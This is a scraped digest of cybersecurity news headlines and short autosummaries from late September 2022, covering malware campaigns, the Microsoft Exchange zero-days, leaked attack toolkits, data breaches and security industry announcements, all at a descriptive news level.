                2022-09-29 https://www.helpnetsecurity.com/2022/09/29/phishing-activity-2022-video/

                The APWG’s Phishing Activity Trends Report reveals that in the second quarter of 2022, the APWG observed 1,097,811 total phishing attacks — the worst quarter for phishing that APWG has ever observed. This Help Net Security video uncovers how the number of phishing attacks reported has quadrupled since early 2020.

                The post Phishing activity exploded in Q2 2022 appeared first on Help Net Security.



                A cracked copy of Brute Ratel post-exploitation tool leaked on hacking forums

                exploits
                2022-09-29 https://securityaffairs.co/wordpress/136395/cyber-crime/brute-ratel-cracked-copy.html

                The Brute Ratel post-exploitation toolkit has been cracked and now is available in the underground hacking and cybercrime communities. Threat actors have cracked the Brute Ratel C4 (BRC4) post-exploitation toolkit and leaked it for free in the cybercrime underground. The availability of the cracked version of the tool was first reported by the cybersecurity researcher Will […]

                The post A cracked copy of Brute Ratel post-exploitation tool leaked on hacking forums appeared first on Security Affairs.

                Autosummary: The availability of the cracked version of the tool was first reported by the cybersecurity researcher Will Thomas (@BushidoToken), who tweeted on September 28, 2022: “ICYMI, threat actors on multiple underground forums are sharing around a copy of a cracked version of Brute Ratel (aka BRC4), brace for attacks "bruteratel_1.2.2.Scandinavian_Defense.tar.gz" https://t.co/jfWXV8sJbR h/t @darkcoders_mrx for the pic”. Unlike Cobalt Strike beacons, BRc4 payloads are less popular, but with similar capabilities. Two weeks later, on 28 September, the author of BRC4, Chetan Nayak, confirmed the leak of the tool by MdSec and blamed a Russian-speaking group known as Molecules for the leak of the cracked copy.


                Go-based Chaos malware is rapidly growing targeting Windows, Linux and more

                exploits
                2022-09-29 https://securityaffairs.co/wordpress/136384/malware/chaos-malware-windows-linux.html

                A new multifunctional Go-based malware dubbed Chaos is targeting both Windows and Linux systems, experts warn. Researchers from Black Lotus Labs at Lumen Technologies recently uncovered a multifunctional Go-based malware that was developed to target devices based on multiple architectures, including Windows and Linux. The malicious code was developed to target a broad range of devices, […]

                The post Go-based Chaos malware is rapidly growing targeting Windows, Linux and more appeared first on Security Affairs.



                New malware backdoors VMware ESXi servers to hijack virtual machines

                exploits
                2022-09-29 https://www.bleepingcomputer.com/news/security/new-malware-backdoors-vmware-esxi-servers-to-hijack-virtual-machines/
                Hackers have found a new method to establish persistence on VMware ESXi hypervisors to control vCenter servers and virtual machines for Windows and Linux while avoiding detection. [...]

                Autosummary: The VIB package includes the following: an archive, typically referred to as "payload", that contains the files that need to be installed on the host; an XML descriptor with information about the VIB requirements, dependencies, compatibility issues, payload to install, name and install date; and a signature file that verifies the maker of the VIB and the level of trust associated with it. VIBs can be created by VMware (created and tested by the company), approved partners, or the community (not a source accepted through the VMware program, such as individuals or third-party partners).


                Upgraded Prilex Point-of-Sale malware bypasses credit card security

                exploits
                2022-09-29 https://www.bleepingcomputer.com/news/security/upgraded-prilex-point-of-sale-malware-bypasses-credit-card-security/
                Security analysts have observed three new versions of Prilex this year, indicating that the authors and operators of the PoS-targeting malware are back to action. [...]

                Autosummary: The backdoor supports various capabilities, such as file actions, command execution, process termination, registry modification, and screen capturing.


                Swachh City Platform Suffers Data Breach Leaking 16 Million User Records

                financial government
                2022-09-29 https://thehackernews.com/2022/09/swachh-city-platform-suffers-data.html
                A threat actor by the name of LeakBase has shared a database containing personal information allegedly affecting 16 million users of Swachh City, an Indian complaint redressal platform. Leaked details include usernames, email addresses, password hashes, mobile numbers, one-time passwords, last logged-in times, and IP addresses, among others, according to a report shared by security firm CloudSEK


                Hackers Aid Protests Against Iranian Government with Proxies, Leaks and Hacks

                government
                2022-09-29 https://thehackernews.com/2022/09/hackers-aid-protests-against-iranian.html
                Several hacktivist groups are using Telegram and other tools to aid anti-government protests in Iran to bypass regime censorship restrictions amid ongoing unrest in the country following the death of Mahsa Amini in custody. "Key activities are data leaking and selling, including officials' phone numbers and emails, and maps of sensitive locations," Israeli cybersecurity firm Check Point said in


                New Royal Ransomware emerges in multi-million dollar attacks

                exploits ransomware
                2022-09-29 https://www.bleepingcomputer.com/news/security/new-royal-ransomware-emerges-in-multi-million-dollar-attacks/
                A new ransomware operation named Royal is quickly ramping up, targeting corporations with ransom demands ranging from $250,000 to over $2 million. [...]

                Autosummary: (Figure: example of a Royal callback phishing email. Source: AdvIntel.) When a victim calls the number, the threat actors use social engineering to convince the victim to install remote access software, which is used to gain initial access to the corporate network. However, it is strongly advised that network, Windows, and security admins keep an eye out for this group, as they are quickly ramping up operations and will likely become one of the more significant enterprise-targeting ransomware operations.


                How to protect your Mac against ransomware and other cyberthreats

                exploits ransomware
                2022-09-29 https://www.bleepingcomputer.com/news/security/how-to-protect-your-mac-against-ransomware-and-other-cyberthreats/
                A popular myth says that "Macs don't get viruses," but that's never quite been true — and today's Mac users face more cyberthreats than ever before. If you've got a friend or family member who thinks they don't have to worry at all about cybersecurity, pass along this article. [...]

                Autosummary: For instance: attacks on web-based apps and services (like Microsoft 365) could lead to data loss; phishing emails can impact anyone, anytime, causing you to download a malicious attachment or inadvertently reveal sensitive information — no matter whether you’re on a Windows computer, a Mac or even your smartphone. They are the ones you spend hours reminding everyone else to follow: avoiding clicking on email attachments or links from unknown senders; installing the latest software updates as soon as they’re available; never bypassing security settings to install apps if you’re not 100% certain of their safety. Still, even the tech-savviest among us can make mistakes or otherwise fall victim to ransomware and other cyberthreats. Even offline events, like hardware damage or having your laptop stolen, can cause you to lose valuable files, photos and other data if they’re not safely backed up.


                Brazilian Prilex Hackers Resurfaced With Sophisticated Point-of-Sale Malware

                exploits latam
                2022-09-29 https://thehackernews.com/2022/09/brazilian-prilex-hackers-resurfaced.html
                A Brazilian threat actor known as Prilex has resurfaced after a year-long operational hiatus with an advanced and complex malware to steal money by means of fraudulent transactions. "The Prilex group has shown a high level of knowledge about credit and debit card transactions, and how software used for payment processing works," Kaspersky researchers said. "This enables the attackers to keep

                Autosummary: Prilex is "dealing directly with the PIN pad hardware protocol instead of using higher level APIs, doing real-time patching in target software, hooking operating system libraries, messing with replies, communications and ports, and switching from a replay-based attack to generate cryptograms for its GHOST transactions even from credit cards protected with CHIP and PIN technology," the researchers said.


                New Microsoft Exchange zero-days reportedly exploited in attacks

                exploits
                2022-09-29 https://www.bleepingcomputer.com/news/security/new-microsoft-exchange-zero-days-reportedly-exploited-in-attacks/
                Threat actors are exploiting yet-to-be-disclosed Microsoft Exchange zero-day bugs allowing for remote code execution, according to claims made by security researchers at Vietnamese cybersecurity outfit GTSC, who first spotted and reported the attacks. [...]

                Autosummary: Temporary mitigation available: until Microsoft releases security updates to address the two zero-days, GTSC shared temporary mitigation that would block attack attempts by adding a new IIS server rule using the URL Rewrite Rule module: In Autodiscover at FrontEnd, select tab URL Rewrite, and then Request Blocking.


                Hacking group hides backdoor malware inside Windows logo image

                exploits
                2022-09-29 https://www.bleepingcomputer.com/news/security/hacking-group-hides-backdoor-malware-inside-windows-logo-image/
                Security researchers have discovered a malicious campaign by the "Witchetty" hacking group, which uses steganography to hide a backdoor malware in a Windows logo. [...]

                Autosummary: Next, the threat actors fetch the backdoor hiding in the image file, which enables them to do the following: perform file and directory actions; start, enumerate, or kill processes; modify the Windows Registry; download additional payloads; and exfiltrate files. Witchetty also introduced a custom proxy utility that causes the infected computer to act "as the server and connects to a C&C server acting as a client, instead of the other way around."


                New Microsoft Exchange zero-day actively exploited in attacks

                exploits
                2022-09-29 https://www.bleepingcomputer.com/news/security/new-microsoft-exchange-zero-day-actively-exploited-in-attacks/
                Threat actors are exploiting yet-to-be-disclosed Microsoft Exchange zero-day bugs allowing for remote code execution, according to claims made by security researchers at Vietnamese cybersecurity outfit GTSC, who first spotted and reported the attacks. [...]

                Autosummary: Temporary mitigation available: until Microsoft releases security updates to address the two zero-days, GTSC shared temporary mitigation that would block attack attempts by adding a new IIS server rule using the URL Rewrite Rule module: In Autodiscover at FrontEnd, select tab URL Rewrite, and then Request Blocking.


                Local government cybersecurity: 5 best practices

                government ciber
                2022-09-29 https://www.malwarebytes.com/blog/business/2022/09/local-government-cybersecurity-5-best-practices

                Categories: Business

                With a few best practices, local governments can improve their cybersecurity posture and make it less likely that threat actors attack their systems. We’ll break down five best practices for local government cybersecurity in this post.

                The post Local government cybersecurity: 5 best practices appeared first on Malwarebytes Labs.

                Autosummary: In particular, local governments looking to be eligible for the State and Local Cybersecurity Grant Program must include these best practices in their cybersecurity plan: In addition, only 23% of local governments have adopted the .gov domain, meaning a majority of local governments are missing out on one of the simplest ways to strengthen their cybersecurity posture. Know who you’re going to contact: maintain an up-to-date list of internal and external stakeholders to contact in the event of an attack, which may include senior management, PR, your legal team, insurance providers, vendors, and law enforcement. NIST recommends that organizations follow these steps to accelerate their recovery, among others: Develop an incident recovery plan: establish a plan that has a Cyber Incident Response Team (CIRT) with clearly identified roles, responsibilities, and contacts ahead of time, then regularly exercise that plan. Some of the functions commonly outsourced are: “By working with a trusted partner or service provider, local governments can fast track to get their security stack up to par,” said David Pier, Team Lead, Corporate Solutions Engineering at Malwarebytes.


                Optus data breach "attacker" says sorry, it was a mistake

                financial
                2022-09-29 https://www.malwarebytes.com/blog/news/2022/09/optus-data-breach-attacker-says-sorry-it-was-a-mistake

                Categories: News

                Tags: Optus, breach, optusdata, text messages, drivers' licenses, Medicare, identity protection

                A hacker stole the personal information of 10 million Optus customers, threatened to publish it in lots of 10,000 a day unless the ransom was paid, and then suddenly did a 180 degree turn.

                The post Optus data breach "attacker" says sorry, it was a mistake appeared first on Malwarebytes Labs.

                Autosummary: In a definitely related activity, but probably not by the same threat actor, victims of the data breach have also started to receive text messages saying they must pay AUD 2,000 ($1,300) within two days or their data will be sold on for “fraudulent activity”. Extortion: on an online forum, optusdata threatened to publish the data of 10,000 Optus customers per day unless they received $1 million in cryptocurrency.


                New Microsoft Exchange zero-days actively exploited in attacks

                exploits
                2022-09-29 https://www.bleepingcomputer.com/news/security/new-microsoft-exchange-zero-days-actively-exploited-in-attacks/
                Threat actors are exploiting yet-to-be-disclosed Microsoft Exchange zero-day bugs allowing for remote code execution, according to claims made by security researchers at Vietnamese cybersecurity outfit GTSC, who first spotted and reported the attacks. [...]

                Autosummary: Temporary mitigation available: until Microsoft releases security updates to address the two zero-days, GTSC shared temporary mitigation that would block attack attempts by adding a new IIS server rule using the URL Rewrite Rule module: In Autodiscover at FrontEnd, select tab URL Rewrite, and then Request Blocking.


                A personal perspective on investing in cybersecurity

                ciber
                2022-09-28 https://www.helpnetsecurity.com/2022/09/28/personal-perspective-investing-cybersecurity-video/

                Cyber threats worldwide continue to escalate and drive continued innovation and investment in cybersecurity. Cyber budgets remain high, and the cyber market continues to outpace other IT sectors. In this Help Net Security video, Nick Kingsbury, Partner at Amadeus Capital Partners, offers a unique perspective on investing in cybersecurity. Amadeus Capital Partners is a global technology investor. Since 1997, the firm has backed over 180 companies and raised over $1 billion for investment.

                The post A personal perspective on investing in cybersecurity appeared first on Help Net Security.



                TransUnion TruValidate Device Risk with Behavioral Analytics improves fraud detection for businesses

                industry
                2022-09-28 https://www.helpnetsecurity.com/2022/09/28/transunion-truvalidate-device-risk-with-behavioral-analytics/

                To help limit the more than $100 billion of global sales revenue lost to false positives during the fraud detection process, TransUnion launched TruValidate Device Risk with Behavioral Analytics. The solution is newly fortified by NeuroID’s behavioral analytics and aims to help businesses stop fraud – not good customers – based on device recognition, context, device and user behavior. The solution builds trusted connections by allowing users to join a global network of 6,000 fraud …

                The post TransUnion TruValidate Device Risk with Behavioral Analytics improves fraud detection for businesses appeared first on Help Net Security.

                Autosummary: By analyzing this data in real-time, these products can help provide critical information as to whether a loan applicant’s intentions are genuine, or deceptive, without adding any additional friction to the process,” said Jason Laky, executive vice president and head of financial services at TransUnion.


                Critical WhatsApp Bugs Could Have Let Attackers Hack Devices Remotely

                exploits
                2022-09-28 https://thehackernews.com/2022/09/critical-whatsapp-bugs-could-have-let.html
                WhatsApp has released security updates to address two flaws in its messaging app for Android and iOS that could lead to remote code execution on vulnerable devices. One of them concerns CVE-2022-36934 (CVSS score: 9.8), a critical integer overflow vulnerability in WhatsApp that results in the execution of arbitrary code simply by establishing a video call. The issue impacts the WhatsApp and


                Leaked LockBit 3.0 builder used by ‘Bl00dy’ ransomware gang in attacks

                exploits ransomware
                2022-09-28 https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/
                The relatively new Bl00Dy Ransomware Gang has started to use a recently leaked LockBit ransomware builder in attacks against companies. [...]

                Autosummary: (Figure: LockBit 3.0 ransomware builder configuration file. Source: BleepingComputer.) Unfortunately, our predictions have come true, and a relatively new ransomware group named "Bl00Dy Ransomware Gang" has already utilized the builder in an attack on a Ukrainian entity.


                Multi-platform Chaos malware threatens to live up to its name

                exploits
                2022-09-28 https://www.helpnetsecurity.com/2022/09/28/chaos-malware/

                Chaos, new multipurpose malware written in the Go programming language, is spreading across the world. “We are seeing a complex malware that has quadrupled in size in just two months, and it is well-positioned to continue accelerating,” said Mark Dehus, director of threat intelligence at Lumen‘s Black Lotus Labs. Versatile and potent: Chaos is designed to work across several architectures, including ARM, Intel (i386), MIPS and PowerPC. It was developed for Windows, Linux, and a …

                The post Multi-platform Chaos malware threatens to live up to its name appeared first on Help Net Security.



                Researchers Warn of New Go-based Malware Targeting Windows and Linux Systems

                exploits
                2022-09-28 https://thehackernews.com/2022/09/researchers-warn-of-new-go-based.html
                A new, multi-functional Go-based malware dubbed Chaos has been rapidly growing in volume in recent months to ensnare a wide range of Windows, Linux, small office/home office (SOHO) routers, and enterprise servers into its botnet. "Chaos functionality includes the ability to enumerate the host environment, run remote shell commands, load additional modules, automatically propagate through

                Autosummary: What's more, the malware has versatility that similar malware does not, enabling it to operate across a wide range of instruction set architectures from ARM, Intel (i386), MIPS, and PowerPC, effectively allowing the threat actor to broaden the scope of its targets and swiftly accrue in volume.


                Cyber Criminals Using Quantum Builder Sold on Dark Web to Deliver Agent Tesla Malware

                exploits
                2022-09-28 https://thehackernews.com/2022/09/cyber-criminals-using-quantum-builder.html
                A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT). "This campaign features enhancements and a shift toward LNK (Windows shortcut) files when compared to similar attacks in the past," Zscaler ThreatLabz researchers Niraj Shivtarkar and Avinash Kumar said in a Tuesday write-up. Sold on the dark web for €


                Hackers Using PowerPoint Mouseover Trick to Infect System with Malware

                exploits
                2022-09-28 https://thehackernews.com/2022/09/hackers-using-powerpoint-mouseover.html
                The Russian state-sponsored threat actor known as APT28 has been found leveraging a new code execution method that makes use of mouse movement in decoy Microsoft PowerPoint documents to deploy malware. The technique "is designed to be triggered when the user starts the presentation mode and moves the mouse," cybersecurity firm Cluster25 said in a technical report. "The code execution runs a


                APT28 relies on PowerPoint Mouseover to deliver Graphite malware

                exploits
                2022-09-28 https://securityaffairs.co/wordpress/136358/apt/apt28-powerpoint-mouseover-technique.html

                The Russia-linked APT28 group is using mouse movement in decoy Microsoft PowerPoint documents to distribute malware. The Russia-linked APT28 employed a technique relying on mouse movement in decoy Microsoft PowerPoint documents to deploy malware, researchers from Cluster25 reported. Cluster25 researchers were analyzing a lure PowerPoint document used to deliver a variant of Graphite malware, which is known to be used […]

                The post APT28 relies on PowerPoint Mouseover to deliver Graphite malware appeared first on Security Affairs.

                Autosummary: “Finally, based on several indicators, geopolitical objectives and the analyzed artifacts, Cluster25 attributes this campaign to the Russia-linked threat actor known as APT28 (aka Fancy Bear, TSAR Team, Pawn Storm, Sednit) and indicates entities and individuals operating in the defense and government sectors of Europe and Eastern Europe countries as potential targets,” concludes the report.


                Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks

                exploits ransomware
                2022-09-28 https://securityaffairs.co/wordpress/136345/cyber-crime/bl00dy-ransomware-lockbit-3-encryptor.html

                The recently born Bl00Dy Ransomware gang has started using the recently leaked LockBit ransomware builder in attacks in the wild. The Bl00Dy Ransomware gang is the first group that started using the recently leaked LockBit ransomware builder in attacks in the wild. Last week, an alleged disgruntled developer leaked the builder for the latest encryptor […]

                The post Bl00dy ransomware gang started using leaked LockBit 3.0 builder in attacks appeared first on Security Affairs.



                New Chaos malware infects Windows, Linux devices for DDoS attacks

                exploits
                2022-09-28 https://www.bleepingcomputer.com/news/security/new-chaos-malware-infects-windows-linux-devices-for-ddos-attacks/
                A quickly expanding botnet called Chaos is targeting and infecting Windows and Linux devices to use them for cryptomining and launching DDoS attacks. [...]

                Autosummary: This Go-based malware can also infect various architectures, including x86, x86-64, AMD64, MIPS, MIPS64, ARMv5-ARMv8, AArch64, and PowerPC, used by a wide range of devices from small office/home office routers to enterprise servers.


                Threat actors use Quantum Builder to deliver Agent Tesla malware

                exploits
                2022-09-28 https://securityaffairs.co/wordpress/136370/uncategorized/quantum-builder-agent-tesla-rat.html

                The recently discovered malware builder Quantum Builder is being used by threat actors to deliver the Agent Tesla RAT. A recently discovered malware builder called Quantum Builder is being used to deliver the Agent Tesla remote access trojan (RAT), Zscaler ThreatLabz researchers warn. “Quantum Builder (aka “Quantum Lnk Builder”) is used to create malicious shortcut […]

                The post Threat actors use Quantum Builder to deliver Agent Tesla malware appeared first on Security Affairs.


                Autosummary: Below are the key features of this attack: The threat actors are evolving their tactics by incorporating new infection chains for delivering Agent Tesla on target machines by leveraging the LNK and HTA payloads generated by a builder dubbed “Quantum Builder”. The Quantum Builder is a builder sold in the cybercrime marketplace and is capable of generating LNK, HTA, and ISO payloads consisting of sophisticated techniques to download and execute the final payload with a multi-staged attack chain.


                IRS warns Americans of massive rise in SMS phishing attacks

                financial
                2022-09-28 https://www.bleepingcomputer.com/news/security/irs-warns-americans-of-massive-rise-in-sms-phishing-attacks/
                The Internal Revenue Service (IRS) warned Americans of an exponential rise in IRS-themed text message phishing attacks trying to steal their financial and personal information in the last few weeks. [...]

                Autosummary: "Scam SMS/text messages can also be copied and forwarded to wireless providers via text to 7726 (SPAM), which helps them spot and block similar messages in the future," the IRS added.


                GuidePoint Security releases ICS Security Services to address OT security challenges

                industry
                2022-09-28 https://www.helpnetsecurity.com/2022/09/29/guidepoint-security-ics-security-services/

                GuidePoint Security has released its ICS Security Services that include a Security Program Review, Security Architecture Review and ICS Penetration Testing that collectively are designed to provide an organization with a holistic view of their entire ICS security posture. Traditionally, Operational Technology (OT) environments were kept separate and isolated from the traditional IT infrastructure. Today, ICS environments have emerged from the combination of IT and OT (Industry 4.0), introducing new features and easier management, but … More

                The post GuidePoint Security releases ICS Security Services to address OT security challenges appeared first on Help Net Security.


                Autosummary: GuidePoint’s ICS Security Service offerings include: Security Program Review (SPR): The SPR evaluates and measures an organization’s security program maturity and is based on the framework chosen by the customer, including, but not limited to: NIST Cybersecurity Framework (CSF), NIST 800-82, CIS Controls, ISO/IEC 62443, ISO 27001, C2M2, FERC/NERC-CIP, CISA TSS and ITU CIIP.


                Hackers now sharing cracked Brute Ratel post-exploitation kit online

                exploits
                2022-09-28 https://www.bleepingcomputer.com/news/security/hackers-now-sharing-cracked-brute-ratel-post-exploitation-kit-online/
                The Brute Ratel post-exploitation toolkit has been cracked and is now being shared for free across Russian-speaking and English-speaking hacking communities. [...]

                Autosummary: "There are now multiple posts on multiple of the most populated cybercrime forums where data brokers, malware developers, initial access brokers, and ransomware affiliates all hang out," warns Thomas in a new report on the cracked version of Brute Ratel.


                APT28 attack uses old PowerPoint trick to download malware

                exploits
                2022-09-28 https://www.malwarebytes.com/blog/news/2022/09/powerpoint-mouseover-triggers-powershell-script-for-malware-delivery

                Categories: News

                Tags: APT28

                Tags: Fancy Bear

                Tags: PowerPoint

                Tags: PowerShell

                Tags: One Drive

                Tags: SyncAppvPublishingServer

                The Russian APT known as Fancy Bear was caught using an old mouseover technique that doesn’t need macros

                The post APT28 attack uses old PowerPoint trick to download malware appeared first on Malwarebytes Labs.

                Autosummary: Posted: September 28, 2022 by The Russian APT known as Fancy Bear was caught using an old mouseover technique that doesn’t need macros Researchers at Cluster25 have published research about exploit code that’s triggered when a user moves their mouse over a link in a booby-trapped PowerPoint presentation.


                4 times students compromised school cybersecurity

                ciber
                2022-09-28 https://www.malwarebytes.com/blog/news/2022/09/when-students-hack-their-schools

                Categories: News

                Tags: School

                Tags: password

                Tags: sticky note

                Tags: lax security

                Sometimes we hear stories about brilliant students that hack their school and get celebrated, but it doesn’t always end well.

                The post 4 times students compromised school cybersecurity appeared first on Malwarebytes Labs.

                Autosummary: 3. 12-year-olds pwn their school district The hack started small, in seventh grade, when the students bypassed their middle school’s internet filters to watch YouTube during lunch. Guilty until proven innocent A Canadian student at Tufts University veterinarian school was expelled for an elaborate months-long scheme involving stealing and using university logins to break into the student records system, view answers, and alter her own and other students’ grades.


                Elevate Security partners with Booz Allen Hamilton to combat advanced cybersecurity attack

                ciber
                2022-09-28 https://www.helpnetsecurity.com/2022/09/29/elevate-security-booz-allen-hamilton/

                Elevate Security and Booz Allen Hamilton announced a strategic partnership that aligns Booz Allen’s cybersecurity consulting services with Elevate’s human cyber risk quantification and mitigation software to address the human element of cybersecurity risk. Booz Allen’s Commercial team will leverage Elevate’s vast cyber risk intelligence capabilities to deliver rapid risk assessments and provide deep visibility to organization-wide internal cyber risk. Additionally, Elevate will power the Booz Allen Commercial team’s Dynamic Cyber Trust solution, which adapts … More

                The post Elevate Security partners with Booz Allen Hamilton to combat advanced cybersecurity attack appeared first on Help Net Security.


                Autosummary: “Our Dynamic Cyber Trust solution leverages the Elevate Security platform to create a uniquely scalable approach that holistically targets one of cybersecurity’s root causes of failure – people,” said Andrew Turner, executive vice president, chief technology officer, and market strategy lead for Booz Allen’s global Commercial business.


                Cybrary and Carahsoft join forces to provide cybersecurity training for government customers

                government ciber
                2022-09-28 https://www.helpnetsecurity.com/2022/09/29/cybrary-carahsoft/

                Cybrary announced a partnership with Carahsoft Technology Corp to provide cybersecurity skill development to government agencies and customers. Under the agreement, Carahsoft will serve as Cybrary’s Public Sector distributor, making the company’s cybersecurity training and skills development platform available to the Public Sector through Carahsoft’s reseller partners, NASA Solutions for Enterprise-Wide Procurement (SEWP) V, Information Technology Enterprise Solutions – Software 2 (ITES-SW2), OMNIA Partners, National Association of State Procurement Officials (NASPO), ValuePoint, and National Cooperative … More

                The post Cybrary and Carahsoft join forces to provide cybersecurity training for government customers appeared first on Help Net Security.



                The various ways ransomware impacts your organization

                exploits ransomware
                2022-09-27 https://www.helpnetsecurity.com/2022/09/27/various-ways-ransomware-impacts-your-organization/

                Despite increased investment in tools to fight ransomware, 90% of organizations were affected by ransomware in some capacity over the past 12 months, according to SpyCloud’s 2022 Ransomware Defense Report. Allocation of security budgets Respondents ranked the risk of attack through third-party vendors as the main factor driving the allocation of security budgets, followed by the rise in frequency and sophistication of ransomware attacks. As a result, organizations’ ransomware mitigation solutions focus increasingly on the … More

                The post The various ways ransomware impacts your organization appeared first on Help Net Security.


                Autosummary: We have heard warnings recently against using SMS authentication for MFA since texts can be intercepted by motivated cybercriminals, but even push notifications and authentication applications are not completely foolproof or secure, which these malware and compromised cookies trends are showing,” Darren Siegel, Cyber Security Expert at Specops Software, told Help Net Security. Cybercriminals deploy malware to steal data including credentials to workforce applications, browser fingerprints, and device or web session cookies, enabling them to impersonate an employee and access and encrypt data while bypassing MFA and other security controls.


                The key differences between a business continuity plan and a disaster recovery plan

                ransomware
                2022-09-27 https://www.helpnetsecurity.com/2022/09/27/differences-between-business-continuity-plan-disaster-recovery-plan-video/

                In this Help Net Security video, Chip Gibbons, CISO at Thrive, illustrates the differences between a business continuity plan and a disaster recovery plan. While these terms are often used interchangeably, there are important differences and it’s critical to have both plans in place to help mitigate the impact on business operations: A business continuity plan refers to how a business continues to operate when key systems are down or an outage occurs. A business … More

                The post The key differences between a business continuity plan and a disaster recovery plan appeared first on Help Net Security.



                Why zero trust should be the foundation of your cybersecurity ecosystem

                ciber
                2022-09-27 https://www.helpnetsecurity.com/2022/09/27/why-zero-trust-should-be-the-foundation-of-your-cybersecurity-ecosystem/

                For cybersecurity professionals, it is a huge challenge to separate the “good guys” from the “villains”. In the past, most cyberattacks could simply be traced to external cybercriminals, cyberterrorists, or rogue nation-states. But not anymore. Threats from within organizations – also known as “insider threats” – are increasing and cybersecurity practitioners are feeling the pain. Traditional perimeter defenses are not designed to prevent these attacks. They also struggle to keep external attackers out. Clever hackers … More

                The post Why zero trust should be the foundation of your cybersecurity ecosystem appeared first on Help Net Security.


                Autosummary: The guide explains how your organization can design a zero trust implementation strategy, select an appropriate methodology, assemble the right tools, and execute the implementation plan for successful zero trust adoption. The growth of zero trust Recently, zero trust has developed a large following due to a surge in insider attacks and an increase in remote work – both of which challenge the effectiveness of traditional perimeter-based security approaches. New eBook helps you implement zero trust The Cynet zero trust eBook walks through the core concepts and principles of zero trust.


                MS SQL servers are getting hacked to deliver ransomware to orgs

                exploits ransomware
                2022-09-27 https://www.helpnetsecurity.com/2022/09/27/ms-sql-servers-hacked-ransomware/

                Cybercriminals wielding the FARGO (aka Mallox, aka TargetCompany) ransomware are targeting Microsoft SQL (MS SQL) servers, AhnLab’s ASEC analysis team has warned. They haven’t pinpointed how the attackers are getting access to the targeted servers, but noted that typical attacks targeting database servers include brute force and dictionary attacks aimed at ferreting out the passwords of existing, poorly secured accounts. “And there may be vulnerability attacks on systems that do not have a vulnerability patch … More

                The post MS SQL servers are getting hacked to deliver ransomware to orgs appeared first on Help Net Security.



                Erbium info-stealing malware, a new option in the threat landscape

                exploits
                2022-09-27 https://securityaffairs.co/wordpress/136285/malware/erbium-info-stealing-malware.html

                The recently discovered Erbium information-stealer is being distributed as fake cracks and cheats for popular video games. Threat actors behind the new ‘Erbium’ information-stealing malware are distributing it as fake cracks and cheats for popular video games to steal victims’ credentials and cryptocurrency wallets. The Erbium info-stealing malware was first spotted by researchers at threat […]

                The post Erbium info-stealing malware, a new option in the threat landscape appeared first on Security Affairs.


                Autosummary: System information (CPU, GPU, DISK, RAM, number of monitors, monitor resolutions, MAC, Windows version, Windows owner, PC name, PC architecture, Windows license key) Passwords, cookies, history, maps, autofill from most popular browsers based on Gecko and Chromium Cold wallets from browsers (MetaMask, TronLink, Binance Chain Wallet, Yoroi, Nifty Wallet, Math Wallet, Coinbase Wallet, Guarda, EQUAL Wallet, Jaxx Liberty, BitApp Wallet, iWallet, Wombat, MEW CX, GuildWallet, Saturn Wallet, Ronin Wallet, NeoLine, Clover Wallet, Liquality Wallet, Terra Station, Keplr, Sollet, Auro Wallet, Polymesh Wallet, ICONex, Nabox Wallet, KHC, Temple, TezBox, Cyano Wallet, Byone, OneKey, LeafWallet, DAppPlay, BitClip, Steem Keychain, Nash Extension, Hycon Lite Client, ZilPay, Coin98 Wallet, Harmony, KardiaChain, Rabby, Phantom, TON Crystal Wallet) Other browser plugins (Authenticator, Authy, Trezor Password Manager, GAuth Authenticator, EOS Authenticator) Steam (list of accounts and authorization files) Cold desktop wallets (Exodus, Atomic, Armory, Bitcoin-Core, Bytecoin, Dash-Core, Electrum, Electron, Coinomi, Ethereum, Litecoin-Core, Monero-Core, Zcash, Jaxx) “Erbium is an info-stealer capable of strongly impacting the confidentiality and integrity of the data and information contained in the systems it affects and is an example of how the panorama of malicious tools is constantly evolving, offering proposals that are increasingly within reach of all, in consideration of the low selling prices,” says Emanuele De Lucia, Director of Cyber Intelligence at Cluster25.


                Scams targeting crypto enthusiasts are becoming increasingly common

                financial
                2022-09-27 https://www.helpnetsecurity.com/2022/09/27/crypto-giveaway-scams-video/

                Group-IB has noted a fivefold increase in the number of domains used for crypto giveaway scams that involve fake YouTube streams in the first half of 2022. This Help Net Security video reveals how crypto giveaway scams have evolved into a profitable illicit market segment.

                The post Scams targeting crypto enthusiasts are becoming increasingly common appeared first on Help Net Security.



                New NullMixer Malware Campaign Stealing Users’ Payment Data and Credentials

                exploits
                2022-09-27 https://thehackernews.com/2022/09/new-nullmixer-malware-campaign-stealing.html
                Cybercriminals are continuing to prey on users searching for cracked software by directing them to fraudulent websites hosting weaponized installers that deploy malware called NullMixer on compromised systems. "When a user extracts and executes NullMixer, it drops a number of malware files to the compromised machine," cybersecurity firm Kaspersky said in a Monday report. "It drops a wide variety "

                Autosummary: Kaspersky said it blocked attempts to infect more than 47,778 victims worldwide, with a majority of the users located in Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey, and the U.S.


                Why Continuous Security Testing is a Must for Organizations Today

                ransomware
                2022-09-27 https://thehackernews.com/2022/09/why-continuous-security-testing-is-must.html
                The global cybersecurity market is flourishing. Experts at Gartner predict that the end-user spending for the information security and risk management market will grow from $172.5 billion in 2022 to $267.3 billion in 2026.  One big area of spending includes the art of putting cybersecurity defenses under pressure, commonly known as security testing. MarketsandMarkets forecasts the global "

                Autosummary: The impact of bug bounty program on cybersecurity By launching a bug bounty program, organizations experience: More robust protection: Company data, brand, and reputation have additional protection through continuous security testing. How bug bounty programs support continuous security testing structures While you’ll receive a certificate to say you’re secure at the end of a penetration test, it won’t necessarily mean that’s still the case the next time you make an update. 5 — Poor-fitting security testing solutions for agile environments Continuous development lifecycles don’t align with penetration testing cycles (often performed annually).


                Ukraine Says Russia Planning Massive Cyberattacks on its Critical Infrastructures

                ciber
                2022-09-27 https://thehackernews.com/2022/09/ukraine-says-russia-planning-massive.html
                The Ukrainian government on Monday warned of "massive cyberattacks" by Russia targeting critical infrastructure facilities located in the country and that of its allies. The attacks are said to be targeting the energy sector, the Main Directorate of Intelligence of the Ministry of Defense of Ukraine (GUR) said. "By the cyberattacks, the enemy will try to increase the effect of missile strikes on "



                Defense firm Elbit Systems of America discloses data breach

                financial
                2022-09-27 https://securityaffairs.co/wordpress/136310/cyber-crime/elbit-systems-of-america-data-breach.html

